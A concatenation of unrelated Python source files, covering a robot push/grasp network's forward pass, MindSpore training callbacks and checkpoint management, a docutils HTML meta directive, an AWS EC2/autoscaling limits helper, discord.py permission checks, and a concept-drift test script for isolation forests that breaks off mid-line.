rotate_mask = F.grid_sample(Variable(input_mask_data).cuda(), flow_grid_before)
else:
rotate_color = F.grid_sample(Variable(input_color_data), flow_grid_before)
rotate_depth = F.grid_sample(Variable(input_depth_data), flow_grid_before)
rotate_mask = F.grid_sample(Variable(input_mask_data), flow_grid_before)
# Compute intermediate features
interm_feat = self.feature_tunk(rotate_color, rotate_depth, rotate_mask)
# Forward pass through branches
push_out = self.pushnet(interm_feat)
grasp_out = self.graspnet(interm_feat)
# Compute sample grid for rotation AFTER branches
affine_mat_after = np.asarray([[np.cos(rotate_theta), np.sin(rotate_theta), 0], [-np.sin(rotate_theta), np.cos(rotate_theta), 0]])
affine_mat_after.shape = (2, 3, 1)
affine_mat_after = torch.from_numpy(affine_mat_after).permute(2, 0, 1).float()
if self.use_cuda:
flow_grid_after = F.affine_grid(Variable(affine_mat_after, requires_grad=False).cuda(), push_out.data.size())
else:
flow_grid_after = F.affine_grid(Variable(affine_mat_after, requires_grad=False), grasp_out.data.size())
# Forward pass through branches, undo rotation on output predictions, upsample results
output_prob.append([F.interpolate(F.grid_sample(push_out, flow_grid_after), scale_factor=16, mode='bilinear', align_corners=True),
F.interpolate(F.grid_sample(grasp_out, flow_grid_after), scale_factor=16, mode='bilinear', align_corners=True)])
return output_prob, interm_feat
else:
self.output_prob = []
# Apply rotations to intermediate features
# for rotate_idx in range(self.num_rotations):
rotate_idx = specific_rotation
rotate_theta = np.radians(rotate_idx*(360/self.num_rotations))
# Compute sample grid for rotation BEFORE branches
affine_mat_before = np.asarray([[np.cos(-rotate_theta), np.sin(-rotate_theta), 0],[-np.sin(-rotate_theta), np.cos(-rotate_theta), 0]])
affine_mat_before.shape = (2, 3, 1)
affine_mat_before = torch.from_numpy(affine_mat_before).permute(2,0,1).float()
if self.use_cuda:
flow_grid_before = F.affine_grid(Variable(affine_mat_before, requires_grad=False).cuda(), input_color_data.size())
else:
flow_grid_before = F.affine_grid(Variable(affine_mat_before, requires_grad=False), input_color_data.size())
# Rotate images clockwise
if self.use_cuda:
rotate_color = F.grid_sample(Variable(input_color_data, requires_grad=False).cuda(), flow_grid_before)
rotate_depth = F.grid_sample(Variable(input_depth_data, requires_grad=False).cuda(), flow_grid_before)
rotate_mask = F.grid_sample(Variable(input_mask_data, requires_grad=False).cuda(), flow_grid_before)
else:
rotate_color = F.grid_sample(Variable(input_color_data, requires_grad=False), flow_grid_before)
rotate_depth = F.grid_sample(Variable(input_depth_data, requires_grad=False), flow_grid_before)
rotate_mask = F.grid_sample(Variable(input_mask_data, requires_grad=False), flow_grid_before)
# Compute intermediate features
self.interm_feat = self.feature_tunk(rotate_color, rotate_depth, rotate_mask)
# Forward pass through branches
push_out = self.pushnet(self.interm_feat)
grasp_out = self.graspnet(self.interm_feat)
# Compute sample grid for rotation AFTER branches
affine_mat_after = np.asarray([[np.cos(rotate_theta), np.sin(rotate_theta), 0], [-np.sin(rotate_theta), np.cos(rotate_theta), 0]])
affine_mat_after.shape = (2, 3, 1)
affine_mat_after = torch.from_numpy(affine_mat_after).permute(2, 0, 1).float()
if self.use_cuda:
flow_grid_after = F.affine_grid(Variable(affine_mat_after, requires_grad=False).cuda(), push_out.data.size())
else:
flow_grid_after = F.affine_grid(Variable(affine_mat_after, requires_grad=False), push_out.data.size())
# Forward pass through branches, undo rotation on output predictions, upsample results
self.output_prob.append([F.interpolate(F.grid_sample(push_out, flow_grid_after), scale_factor=16, mode='bilinear', align_corners=True),
F.interpolate(F.grid_sample(grasp_out, flow_grid_after), scale_factor=16, mode='bilinear', align_corners=True)])
return self.output_prob, self.interm_feat
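# Standalone sketch of the rotate/un-rotate trick used in forward() above. It only
# exercises torch's affine_grid/grid_sample on a dummy tensor and does not touch
# FeatureTunk or the push/grasp branches; the shapes and the 30-degree angle are
# arbitrary choices for illustration.
if __name__ == '__main__':
    theta = np.radians(30.0)
    affine = np.asarray([[np.cos(-theta), np.sin(-theta), 0],
                         [-np.sin(-theta), np.cos(-theta), 0]], dtype=np.float32)
    affine = torch.from_numpy(affine).unsqueeze(0)  # shape (1, 2, 3)
    dummy = torch.zeros(1, 3, 224, 224)             # fake color image batch
    grid = F.affine_grid(affine, dummy.size())
    rotated = F.grid_sample(dummy, grid)
    print('rotated tensor shape:', tuple(rotated.shape))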
|
py | 7df804af0f0eca1a3d871d9b0ee7d92fee0d9a81 | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Callback related classes and functions."""
import os
import stat
import shutil
import time
import numpy as np
import mindspore.context as context
from mindspore.train.serialization import _exec_save_checkpoint, _fill_param_into_net, _save_graph
from mindspore.train._utils import _make_directory
from mindspore import log as logger
from mindspore._checkparam import check_int_non_negative, check_bool
from mindspore.common.tensor import Tensor
from mindspore.train.summary.summary_record import _cache_summary_tensor_data
_cur_dir = os.getcwd()
_cur_net = None
_save_dir = _cur_dir
class _CheckpointManager:
"""Manage checkpoint files according to train_config of checkpoint."""
def __init__(self):
self._ckpoint_filelist = []
@property
def ckpoint_filelist(self):
"""Get all the related checkpoint files managed here."""
return self._ckpoint_filelist
@property
def ckpoint_num(self):
"""Get the number of the related checkpoint files managed here."""
return len(self._ckpoint_filelist)
def update_ckpoint_filelist(self, directory, prefix):
"""Update the checkpoint file list."""
self._ckpoint_filelist = []
files = os.listdir(directory)
for filename in files:
if os.path.splitext(filename)[-1] == ".ckpt" and filename.startswith(prefix):
mid_name = filename[len(prefix):-5]
flag = True
for char in mid_name:
if char.isalpha():
flag = False
if flag:
self._ckpoint_filelist.append(directory + '/' + filename)
def remove_ckpoint_file(self, file_name):
"""Remove the specified checkpoint file from this checkpoint manager and also from the directory."""
try:
os.chmod(file_name, stat.S_IWRITE)
os.remove(file_name)
self._ckpoint_filelist.remove(file_name)
except OSError:
logger.warning("OSError, failed to remove the older ckpt file %s.", file_name)
except ValueError:
logger.warning("ValueError, failed to remove the older ckpt file %s.", file_name)
def remove_oldest_ckpoint_file(self):
"""Remove the oldest checkpoint file from this checkpoint manager and also from the directory."""
ckpoint_files = sorted(self._ckpoint_filelist, key=os.path.getmtime)
self.remove_ckpoint_file(ckpoint_files[0])
def keep_one_ckpoint_per_minutes(self, minutes, cur_time):
"""Only keep the latest one ckpt file per minutes, remove other files generated in [last_time, cur_time]."""
movs = []
oldest_file = ''
oldest_time = cur_time
for ck_file in self._ckpoint_filelist:
modify_time = os.path.getmtime(ck_file)
if cur_time - modify_time < 60 * minutes:
movs.append(ck_file)
if modify_time < oldest_time:
oldest_time = modify_time
oldest_file = ck_file
for mv_file in movs:
if mv_file == oldest_file:
continue
self.remove_ckpoint_file(mv_file)
def _check_file_name_prefix(file_name_prefix):
"""
    Check whether the file name is valid.
    File name can't include '/'. This file name naming convention only applies to Linux.
"""
if not isinstance(file_name_prefix, str) or file_name_prefix.find('/') >= 0:
return False
return True
def _chg_ckpt_file_name_if_same_exist(directory, prefix):
"""Check if there is a file with the same name."""
files = os.listdir(directory)
suffix_num = 0
pre_len = len(prefix)
for filename in files:
name_ext = os.path.splitext(filename)
if name_ext[-1] != ".ckpt":
continue
# find same prefix file
if filename.find(prefix) == 0 and not filename[pre_len].isalpha():
# add the max suffix + 1
index = filename[pre_len:].find("-")
if index == 0:
suffix_num = max(suffix_num, 1)
elif index != -1:
num = filename[pre_len+1:pre_len+index]
if num.isdigit():
suffix_num = max(suffix_num, int(num)+1)
if suffix_num != 0:
prefix = prefix + "_" + str(suffix_num)
return prefix
class CheckpointConfig:
"""
The config for model checkpoint.
Note:
During the training process, if dataset is transmitted through the data channel,
        it is suggested to set save_checkpoint_steps to an integer multiple of loop_size.
        Otherwise, the timing of saving checkpoints may deviate.
Args:
save_checkpoint_steps (int): Steps to save checkpoint. Default: 1.
save_checkpoint_seconds (int): Seconds to save checkpoint. Default: 0.
Can't be used with save_checkpoint_steps at the same time.
        keep_checkpoint_max (int): Maximum number of checkpoint files to keep. Default: 5.
keep_checkpoint_per_n_minutes (int): Keep one checkpoint every n minutes. Default: 0.
Can't be used with keep_checkpoint_max at the same time.
        integrated_save (bool): Whether to perform integrated save in the automatic model parallel scene. Default: True.
Integrated save function is only supported in automatic parallel scene, not supported in manual parallel.
Raises:
ValueError: If the input_param is None or 0.
Examples:
>>> config = CheckpointConfig()
>>> ckpoint_cb = ModelCheckpoint(prefix="ck_prefix", directory='./', config=config)
>>> model.train(10, dataset, callbacks=ckpoint_cb)
"""
def __init__(self,
save_checkpoint_steps=1,
save_checkpoint_seconds=0,
keep_checkpoint_max=5,
keep_checkpoint_per_n_minutes=0,
integrated_save=True):
if not save_checkpoint_steps and not save_checkpoint_seconds and \
not keep_checkpoint_max and not keep_checkpoint_per_n_minutes:
raise ValueError("The input_param can't be all None or 0")
if save_checkpoint_steps:
save_checkpoint_steps = check_int_non_negative(save_checkpoint_steps)
if save_checkpoint_seconds:
save_checkpoint_seconds = check_int_non_negative(save_checkpoint_seconds)
if keep_checkpoint_max:
keep_checkpoint_max = check_int_non_negative(keep_checkpoint_max)
if keep_checkpoint_per_n_minutes:
keep_checkpoint_per_n_minutes = check_int_non_negative(keep_checkpoint_per_n_minutes)
self._save_checkpoint_steps = save_checkpoint_steps
self._save_checkpoint_seconds = save_checkpoint_seconds
if self._save_checkpoint_steps and self._save_checkpoint_steps > 0:
self._save_checkpoint_seconds = None
self._keep_checkpoint_max = keep_checkpoint_max
self._keep_checkpoint_per_n_minutes = keep_checkpoint_per_n_minutes
if self._keep_checkpoint_max and self._keep_checkpoint_max > 0:
self._keep_checkpoint_per_n_minutes = None
else:
if not self._keep_checkpoint_per_n_minutes or self._keep_checkpoint_per_n_minutes == 0:
self._keep_checkpoint_max = 1
self._integrated_save = check_bool(integrated_save)
@property
def save_checkpoint_steps(self):
"""Get the value of _save_checkpoint_steps."""
return self._save_checkpoint_steps
@property
def save_checkpoint_seconds(self):
"""Get the value of _save_checkpoint_seconds."""
return self._save_checkpoint_seconds
@property
def keep_checkpoint_max(self):
"""Get the value of _keep_checkpoint_max."""
return self._keep_checkpoint_max
@property
def keep_checkpoint_per_n_minutes(self):
"""Get the value of _keep_checkpoint_per_n_minutes."""
return self._keep_checkpoint_per_n_minutes
@property
def integrated_save(self):
"""Get the value of _integrated_save."""
return self._integrated_save
def get_checkpoint_policy(self):
"""Get the policy of checkpoint."""
checkpoint_policy = {'save_checkpoint_steps': self._save_checkpoint_steps,
'save_checkpoint_seconds': self._save_checkpoint_seconds,
'keep_checkpoint_max': self._keep_checkpoint_max,
'keep_checkpoint_per_n_minutes': self._keep_checkpoint_per_n_minutes}
return checkpoint_policy
def _set_cur_net(net):
"""
Set current net for which we are using to save checkpoint.
Args:
net (Cell): train network
"""
global _cur_net
_cur_net = net
def _checkpoint_cb_for_save_op(parameter_list):
"""
The checkpoint callback function for MindSpore.
Will be executed by checkpoint save op.
Args:
parameter_list (list): Format is like [{"name",name},{"data",value}] and value type is Tensor.
Returns:
bool, true: means save checkpoint success.
"""
if _cur_net is None:
logger.warning("_cur_net is None. parameters are not updated.")
return False
logger.info("update parameters in the net.")
_fill_param_into_net(_cur_net, parameter_list)
_set_cur_net(None)
return True
def _summary_cb_for_save_op(summary_list):
"""
The summary callback function for MindSpore.
Will be executed by summary op.
Args:
summary_list (list): Format is like [{"name": tag_name, "data": tensor},...] and value is Scalar/Tensor.
Returns:
bool, true: means save summary success.
"""
ret = _cache_summary_tensor_data(summary_list)
return ret
def _build_callbacks(callbacks):
"""
    Wrap the given callbacks into a single executable list of callbacks.
Args:
        callbacks (list): Callback functions list. Supports None, a single Callback object, or a list.
Returns:
List, a list of callback functions.
"""
if callbacks:
if isinstance(callbacks, tuple):
raise TypeError("Callbacks cannot be a tuple. Please check it.")
if not isinstance(callbacks, list):
callbacks = [callbacks]
else:
callbacks = []
excute_callbacks = []
for cb in callbacks:
if cb is None or not isinstance(cb, Callback):
raise TypeError("Callback must inheriting base class Callback. Some callback is Wrong. Please check it.")
excute_callbacks.append(cb)
return _ListCallback(excute_callbacks)
class _ListCallback:
"""
Sequential execution of callback functions.
Execute Callback functions at certain points.
Args:
callbacks (list): Callback functions list.
"""
def __init__(self, callbacks):
super(_ListCallback, self).__init__()
self._callbacks = callbacks
def begin(self, run_context):
"""Called once before network training."""
for cb in self._callbacks:
cb.begin(run_context)
def epoch_begin(self, run_context):
"""Called before each epoch begin."""
for cb in self._callbacks:
cb.epoch_begin(run_context)
def epoch_end(self, run_context):
"""Called after each epoch finished."""
for cb in self._callbacks:
cb.epoch_end(run_context)
def step_begin(self, run_context):
"""Called before each epoch begin."""
for cb in self._callbacks:
cb.step_begin(run_context)
def step_end(self, run_context):
"""Called after each step finished."""
for cb in self._callbacks:
cb.step_end(run_context)
def end(self, run_context):
"""Called once after network training."""
for cb in self._callbacks:
cb.end(run_context)
class Callback:
"""
Abstract base class used to build a callback function.
    Callback functions perform some operations at the current step or epoch.
Examples:
>>> class Print_info(Callback):
>>> def step_end(self, run_context):
>>> cb_params = run_context.original_args()
>>> print(cb_params.cur_epoch_num)
>>> print(cb_params.cur_step_num)
>>>
>>> print_cb = Print_info()
>>> model.train(epoch, dataset, callbacks=print_cb)
"""
def __init__(self):
pass
def begin(self, run_context):
"""
Called once before the network executing.
Args:
run_context (RunContext): Include some information of the model.
"""
def epoch_begin(self, run_context):
"""
Called before each epoch beginning.
Args:
run_context (RunContext): Include some information of the model.
"""
def epoch_end(self, run_context):
"""
Called after each epoch finished.
Args:
run_context (RunContext): Include some information of the model.
"""
def step_begin(self, run_context):
"""
        Called before each step begins.
Args:
run_context (RunContext): Include some information of the model.
"""
def step_end(self, run_context):
"""
Called after each step finished.
Args:
run_context (RunContext): Include some information of the model.
"""
def end(self, run_context):
"""
Called once after network training.
Args:
run_context (RunContext): Include some information of the model.
"""
class SummaryStep(Callback):
"""
The summary callback class.
Args:
summary (Object): Summary recode object.
flush_step (int): Number of interval steps to execute. Default: 10.
"""
def __init__(self, summary, flush_step=10):
super(SummaryStep, self).__init__()
if not isinstance(flush_step, int) or isinstance(flush_step, bool) or flush_step <= 0:
raise ValueError("`flush_step` should be int and greater than 0")
self._summary = summary
self._flush_step = flush_step
def step_end(self, run_context):
"""
Save summary.
Args:
run_context (RunContext): Context of the train running.
"""
cb_params = run_context.original_args()
if cb_params.cur_step_num % self._flush_step == 0:
self._summary.record(cb_params.cur_step_num, cb_params.train_network)
@property
def summary_file_name(self):
return self._summary.full_file_name
class _InternalCallbackParam(dict):
"""Internal callback object's parameters."""
def __getattr__(self, key):
return self[key]
def __setattr__(self, key, value):
self[key] = value
class RunContext:
"""
Provides information about the model.
Run call being made. Provides information about original request to model function.
callback objects can stop the loop by calling request_stop() of run_context.
Args:
original_args (dict): Holding the related information of model etc.
"""
def __init__(self, original_args):
if not isinstance(original_args, dict):
raise TypeError("The arg of RunContext should be dict type.")
self._original_args = original_args
self._stop_requested = False
def original_args(self):
"""
Get the _original_args object.
Returns:
Dict, a object holding the original arguments of model.
"""
return self._original_args
def request_stop(self):
"""
Sets stop requested during training.
Callbacks can use this function to request stop of iterations.
model.train() checks whether this is called or not.
"""
self._stop_requested = True
def get_stop_requested(self):
"""
Returns whether a stop is requested or not.
Returns:
bool, if true, model.train() stops iterations.
"""
return self._stop_requested
class ModelCheckpoint(Callback):
"""
The checkpoint callback class.
    It is called in combination with the training process and saves the model and network parameters after training.
Args:
prefix (str): Checkpoint files names prefix. Default: "CKP".
directory (str): Folder path into which checkpoint files will be saved. Default: None.
config (CheckpointConfig): Checkpoint strategy config. Default: None.
Raises:
ValueError: If the prefix is invalid.
TypeError: If the config is not CheckpointConfig type.
"""
def __init__(self, prefix='CKP', directory=None, config=None):
super(ModelCheckpoint, self).__init__()
self._latest_ckpt_file_name = ""
self._init_time = time.time()
self._last_time = time.time()
self._last_time_for_keep = time.time()
self._last_triggered_step = 0
if _check_file_name_prefix(prefix):
self._prefix = prefix
else:
raise ValueError("Prefix {} for checkpoint file name invalid, "
"please check and correct it and then continue.".format(prefix))
if directory:
self._directory = _make_directory(directory)
else:
self._directory = _cur_dir
if config is None:
self._config = CheckpointConfig()
else:
if not isinstance(config, CheckpointConfig):
raise TypeError("config should be CheckpointConfig type.")
self._config = config
# get existing checkpoint files
self._manager = _CheckpointManager()
self._prefix = _chg_ckpt_file_name_if_same_exist(self._directory, self._prefix)
self._graph_saved = False
def step_end(self, run_context):
"""
Save the checkpoint at the end of step.
Args:
run_context (RunContext): Context of the train running.
"""
cb_params = run_context.original_args()
# save graph (only once)
if not self._graph_saved:
graph_file_name = os.path.join(self._directory, self._prefix + '-graph.meta')
_save_graph(cb_params.train_network, graph_file_name)
self._graph_saved = True
self._save_ckpt(cb_params)
def end(self, run_context):
"""
Save the last checkpoint after training finished.
Args:
run_context (RunContext): Context of the train running.
"""
cb_params = run_context.original_args()
_to_save_last_ckpt = True
self._save_ckpt(cb_params, _to_save_last_ckpt)
from mindspore.parallel._cell_wrapper import destroy_allgather_cell
destroy_allgather_cell()
def _check_save_ckpt(self, cb_params, force_to_save):
"""Check whether save checkpoint files or not."""
if self._config.save_checkpoint_steps and self._config.save_checkpoint_steps > 0:
if cb_params.cur_step_num >= self._last_triggered_step + self._config.save_checkpoint_steps \
or force_to_save is True:
return True
elif self._config.save_checkpoint_seconds and self._config.save_checkpoint_seconds > 0:
self._cur_time = time.time()
if (self._cur_time - self._last_time) > self._config.save_checkpoint_seconds or force_to_save is True:
self._last_time = self._cur_time
return True
return False
def _save_ckpt(self, cb_params, force_to_save=False):
"""Save checkpoint files."""
if cb_params.cur_step_num == self._last_triggered_step:
return
save_ckpt = self._check_save_ckpt(cb_params, force_to_save)
step_num_in_epoch = (cb_params.cur_step_num - 1) % cb_params.batch_num + 1
if save_ckpt:
cur_ckpoint_file = self._prefix + "-" + str(cb_params.cur_epoch_num) + "_" \
+ str(step_num_in_epoch) + ".ckpt"
# update checkpoint file list.
self._manager.update_ckpoint_filelist(self._directory, self._prefix)
# keep checkpoint files number equal max number.
if self._config.keep_checkpoint_max and 0 < self._config.keep_checkpoint_max <= self._manager.ckpoint_num:
self._manager.remove_oldest_ckpoint_file()
elif self._config.keep_checkpoint_per_n_minutes and self._config.keep_checkpoint_per_n_minutes > 0:
self._cur_time_for_keep = time.time()
if (self._cur_time_for_keep - self._last_time_for_keep) \
< self._config.keep_checkpoint_per_n_minutes * 60:
self._manager.keep_one_ckpoint_per_minutes(self._config.keep_checkpoint_per_n_minutes,
self._cur_time_for_keep)
# generate the new checkpoint file and rename it.
global _save_dir
_save_dir = self._directory
cur_file = os.path.join(self._directory, cur_ckpoint_file)
tmp_ckpt_file_name_for_cur_process = str(os.getpid()) + "-" + 'parameters.ckpt'
gen_file = os.path.join(_save_dir, tmp_ckpt_file_name_for_cur_process)
self._last_time_for_keep = time.time()
self._last_triggered_step = cb_params.cur_step_num
if context.get_context("enable_ge"):
_set_cur_net(cb_params.train_network)
cb_params.train_network.exec_checkpoint_graph()
_exec_save_checkpoint(cb_params.train_network, gen_file, self._config.integrated_save)
if os.path.exists(gen_file):
shutil.move(gen_file, cur_file)
self._latest_ckpt_file_name = cur_file
@property
def latest_ckpt_file_name(self):
"""Return the latest checkpoint path and file name."""
return self._latest_ckpt_file_name
class LossMonitor(Callback):
"""
Monitor the loss in training.
If the loss is NAN or INF, it will terminate training.
Note:
        If per_print_times is 0, the loss will not be printed.
Args:
        per_print_times (int): Print the loss every per_print_times steps. Default: 1.
Raises:
ValueError: If print_step is not int or less than zero.
"""
def __init__(self, per_print_times=1):
super(LossMonitor, self).__init__()
if not isinstance(per_print_times, int) or per_print_times < 0:
raise ValueError("print_step must be int and >= 0.")
self._per_print_times = per_print_times
def step_end(self, run_context):
cb_params = run_context.original_args()
loss = cb_params.net_outputs
if isinstance(loss, (tuple, list)):
if isinstance(loss[0], Tensor) and isinstance(loss[0].asnumpy(), np.ndarray):
loss = loss[0]
if isinstance(loss, Tensor) and isinstance(loss.asnumpy(), np.ndarray):
loss = np.mean(loss.asnumpy())
cur_step_in_epoch = (cb_params.cur_step_num - 1) % cb_params.batch_num + 1
if isinstance(loss, float) and (np.isnan(loss) or np.isinf(loss)):
raise ValueError("epoch: {} step: {}. Invalid loss, terminating training."
.format(cb_params.cur_epoch_num, cur_step_in_epoch))
if self._per_print_times != 0 and cb_params.cur_step_num % self._per_print_times == 0:
print("epoch: %s step: %s, loss is %s" % (cb_params.cur_epoch_num, cur_step_in_epoch, loss), flush=True)
class TimeMonitor(Callback):
"""Time Monitor."""
def __init__(self, data_size):
super(TimeMonitor, self).__init__()
self.data_size = data_size
def epoch_begin(self, run_context):
self.epoch_time = time.time()
def epoch_end(self, run_context):
epoch_mseconds = (time.time() - self.epoch_time) * 1000
per_step_mseconds = epoch_mseconds / self.data_size
print("epoch time: {0}, per step time: {1}".format(epoch_mseconds, per_step_mseconds), flush=True)
|
py | 7df80713817c4244fd13fa7744dca8a2beadc56e | # $Id: html.py 7320 2012-01-19 22:33:02Z milde $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
Directives for typically HTML-specific constructs.
"""
__docformat__ = 'reStructuredText'
import sys
from docutils import nodes, utils
from docutils.parsers.rst import Directive
from docutils.parsers.rst import states
from docutils.transforms import components
class MetaBody(states.SpecializedBody):
class meta(nodes.Special, nodes.PreBibliographic, nodes.Element):
"""HTML-specific "meta" element."""
pass
def field_marker(self, match, context, next_state):
"""Meta element."""
node, blank_finish = self.parsemeta(match)
self.parent += node
return [], next_state, []
def parsemeta(self, match):
name = self.parse_field_marker(match)
indented, indent, line_offset, blank_finish = \
self.state_machine.get_first_known_indented(match.end())
node = self.meta()
pending = nodes.pending(components.Filter,
{'component': 'writer',
'format': 'html',
'nodes': [node]})
node['content'] = ' '.join(indented)
if not indented:
line = self.state_machine.line
msg = self.reporter.info(
'No content for meta tag "%s".' % name,
nodes.literal_block(line, line))
return msg, blank_finish
tokens = name.split()
try:
attname, val = utils.extract_name_value(tokens[0])[0]
node[attname.lower()] = val
except utils.NameValueError:
node['name'] = tokens[0]
for token in tokens[1:]:
try:
attname, val = utils.extract_name_value(token)[0]
node[attname.lower()] = val
            except utils.NameValueError as detail:
line = self.state_machine.line
msg = self.reporter.error(
'Error parsing meta tag attribute "%s": %s.'
% (token, detail), nodes.literal_block(line, line))
return msg, blank_finish
self.document.note_pending(pending)
return pending, blank_finish
class Meta(Directive):
has_content = True
SMkwargs = {'state_classes': (MetaBody,)}
def run(self):
self.assert_has_content()
node = nodes.Element()
new_line_offset, blank_finish = self.state.nested_list_parse(
self.content, self.content_offset, node,
initial_state='MetaBody', blank_finish=True,
state_machine_kwargs=self.SMkwargs)
if (new_line_offset - self.content_offset) != len(self.content):
# incomplete parse of block?
error = self.state_machine.reporter.error(
'Invalid meta directive.',
nodes.literal_block(self.block_text, self.block_text),
line=self.lineno)
node += error
return node.children
|
py | 7df8072b1bc20e55d1e52f2b5c8f79da54d13330 | import logging
import boto3
logging.basicConfig()
logger = logging.getLogger()
ASG_INTERESTING_KEYS = ("NumberOfLaunchConfigurations",
"MaxNumberOfLaunchConfigurations",
"MaxNumberOfAutoScalingGroups",
"NumberOfAutoScalingGroups")
def handle_date(obj):
if hasattr(obj, 'isoformat'):
return obj.isoformat()
else:
raise TypeError
class botoclient(object):
def __init__(self, region):
self.region = region
self.ec2_limits = self.get_ec2_limits()
self.asg_limits = self.get_asg_limits()
def connect(self, service):
return boto3.client(service)
def parse_response(self, response, interesting_keys):
return dict((k, response[k]) for k in interesting_keys if k in response)
def get_asg_limits(self):
"""
Returns a dict containing the limits and current usage
"""
response = {}
c = self.connect("autoscaling")
limits = c.describe_account_limits()
return self.parse_response(limits, ASG_INTERESTING_KEYS)
def get_ec2_limits(self):
"""
Queries AWS to get a dict containing the account attributes
returns: dict
"""
c = self.connect("ec2")
limits = c.describe_account_attributes()
result = {}
for account_attribute in limits["AccountAttributes"]:
try:
result[account_attribute["AttributeName"]] = account_attribute["AttributeValues"][0]["AttributeValue"]
except (IndexError, KeyError) as e:
return None
return result
def get_running_ec2(self):
c = self.connect("ec2")
instances = c.describe_instances(Filters=[{
"Name":"instance-state-name",
"Values": ["running"]
}])
count = 0
for reservation in instances["Reservations"]:
count += len(reservation["Instances"])
return count
def get_current_usage(self):
usage = {}
usage["instances"] = {
"current": self.get_running_ec2(),
"limit": int(self.ec2_limits["max-instances"])
}
usage["autoscaling-groups"] = {
"current": self.asg_limits["NumberOfAutoScalingGroups"],
"limit": self.asg_limits["MaxNumberOfAutoScalingGroups"]
}
usage["launch-configurations"] = {
"current": self.asg_limits["NumberOfLaunchConfigurations"],
"limit": self.asg_limits["MaxNumberOfLaunchConfigurations"]
}
return usage
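# Minimal usage sketch; it requires AWS credentials to be configured, and note that
# the region argument is stored but not passed to boto3.client (kept as in the
# class above).
if __name__ == "__main__":
    client = botoclient(region="us-east-1")
    for resource, numbers in client.get_current_usage().items():
        print("%s: %d of %d" % (resource, numbers["current"], numbers["limit"]))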
|
py | 7df807bf76dd16f337b060067b9bf952f0ca6a50 | from discord.ext import commands
from cogs.utils.errors import NotAContributorError
def is_cog_contributor():
"""Check if whoever used the command is in the bots contributors."""
async def predicate(ctx):
if str(ctx.author.id) in ctx.bot.contributors:
return True
else:
raise NotAContributorError(f"Command {ctx.command.name} raised an error: {str(ctx.author)} is not a contributor.")
return commands.check(predicate)
def is_in_guilds(*guild_ids):
"""Checks if the user who invoked the command is in X guilds."""
async def predicate(ctx):
guild = ctx.guild
if guild is None:
return False
return guild.id in guild_ids
return commands.check(predicate) |
py | 7df807d13f0525361cfbf16f272ab9632ceecbb9 | import numpy as np
import logging
import matplotlib.pyplot as plt
from ..common.utils import get_command_args, configure_logger
from ..common.gen_samples import read_anomaly_dataset
from ..common.data_plotter import DataPlotter  # assumed module path for the DataPlotter helper used below
from .aad_globals import (
IFOR_SCORE_TYPE_NEG_PATH_LEN, ENSEMBLE_SCORE_LINEAR, AAD_IFOREST, INIT_UNIF
)
from .data_stream import DataStream, IdServer
from .random_split_trees import TREE_UPD_INCREMENTAL
from .forest_aad_detector import AadForest
from .anomaly_dataset_support import dataset_configs
"""
pythonw -m ad_examples.aad.test_concept_drift --debug --plot --log_file=temp/test_concept_drift.log --dataset=weather
"""
def get_iforest_model(x):
model = AadForest(n_estimators=100, # 100,
max_samples=256,
score_type=IFOR_SCORE_TYPE_NEG_PATH_LEN, random_state=42,
add_leaf_nodes_only=True,
max_depth=100,
ensemble_score=ENSEMBLE_SCORE_LINEAR,
detector_type=AAD_IFOREST, n_jobs=4,
tree_update_type=TREE_UPD_INCREMENTAL,
feature_partitions=None)
model.fit(x)
model.init_weights(init_type=INIT_UNIF)
return model
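# --- Editor's note: hedged sketch (not part of the original script). ---
# Self-contained illustration of the replacement rule applied inside
# test_kl_data_drift() below: trees are replaced when at least a 2*alpha
# fraction of them exceed the alpha-level KL threshold estimated on the
# reference window. The gamma-distributed KL values and the quantile-based
# threshold are illustrative assumptions, not the library's exact computation.
def _illustrate_replacement_rule(alpha=0.05, n_trees=100, seed=0):
    rnd = np.random.RandomState(seed)
    ref_kls = rnd.gamma(2.0, 1.0, size=n_trees)      # KL values on the reference window
    kl_q_alpha = np.quantile(ref_kls, 1.0 - alpha)   # alpha-level threshold
    comp_kls = rnd.gamma(2.5, 1.0, size=n_trees)     # KL values on a new window
    n_exceed = int(np.sum(comp_kls > kl_q_alpha))
    # replace if a 2*alpha fraction of trees exceed the threshold
    return n_exceed >= int(2 * alpha * n_trees)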
def test_kl_data_drift():
logger = logging.getLogger(__name__)
args = get_command_args(debug=False, debug_args=["--debug",
"--plot",
"--log_file=temp/test_concept_drift.log"])
configure_logger(args)
np.random.seed(42)
dataset_config = dataset_configs[args.dataset]
stream_window = dataset_config[2]
alpha = 0.05
X_full, y_full = read_anomaly_dataset(args.dataset)
logger.debug("dataset: %s (%d, %d), stream_window: %d, alpha: %0.3f" %
(args.dataset, X_full.shape[0], X_full.shape[1], stream_window, alpha))
stream = DataStream(X_full, y_full, IdServer(initial=0))
training_set = stream.read_next_from_stream(stream_window)
x, y, ids = training_set.x, training_set.y, training_set.ids
model = get_iforest_model(x)
all_kl_q_alpha = list()
all_reference_kls = list()
all_compare_kls = list()
trees_replaced = list()
# compute KL replacement threshold *without* p
ref_kls, kl_q_alpha = model.get_KL_divergence_distribution(x, p=None, alpha=alpha)
# now initialize reference p
p = model.get_node_sample_distributions(x)
max_kl = np.max(ref_kls)
window = 0 # already read the first window
while True:
buffer = stream.read_next_from_stream(stream_window)
if buffer is None:
break
window += 1
x, y, ids = buffer.x, buffer.y, buffer.ids
# logger.debug("#new: %d" % x.shape[0])
model.add_samples(X=x)
all_kl_q_alpha.append(kl_q_alpha)
all_reference_kls.append(ref_kls)
# compare KL-divergence of current data dist against reference dist p
comp_kls, _ = model.get_KL_divergence_distribution(x, p=p)
all_compare_kls.append(comp_kls)
max_kl = max(max_kl, np.max(comp_kls))
# find which trees exceed alpha-level threshold
replace_trees_by_kl = model.get_trees_to_replace(comp_kls, kl_q_alpha)
n_trees = model.clf.n_estimators
n_replace = 0 if replace_trees_by_kl is None else len(replace_trees_by_kl)
n_threshold = int(2*alpha*n_trees)
# we will replace if 2*alpha number of trees exceed the alpha-threshold
do_replace = n_trees > 0 and n_replace >= n_threshold
logger.debug("window %d: n_replace: %d, threshold num: %d, do_replace: %s" %
